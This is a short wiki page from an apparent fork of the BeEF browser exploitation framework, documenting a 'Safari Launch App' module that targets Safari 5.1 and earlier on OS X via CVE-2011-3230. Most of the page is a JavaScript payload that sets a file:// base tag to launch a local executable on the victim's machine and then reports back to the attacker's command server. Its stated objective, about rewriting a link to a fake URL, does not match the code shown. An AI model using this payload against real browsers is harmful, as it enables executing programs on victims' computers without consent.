Module: Safari Launch App - h4sh5/beef GitHub Wiki
Summary
-
Objective: rewrite a selected real URL link to a fake url
-
Authors: antisnatchor
-
Browsers: Safari <= 5.1 on OSX
Internal Working
uses the file:// scheme to launch an executable
baseTag.setAttribute('href', 'file://');
document.head.appendChild(baseTag);
setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);
References
See CVE-2011-3230 for more details.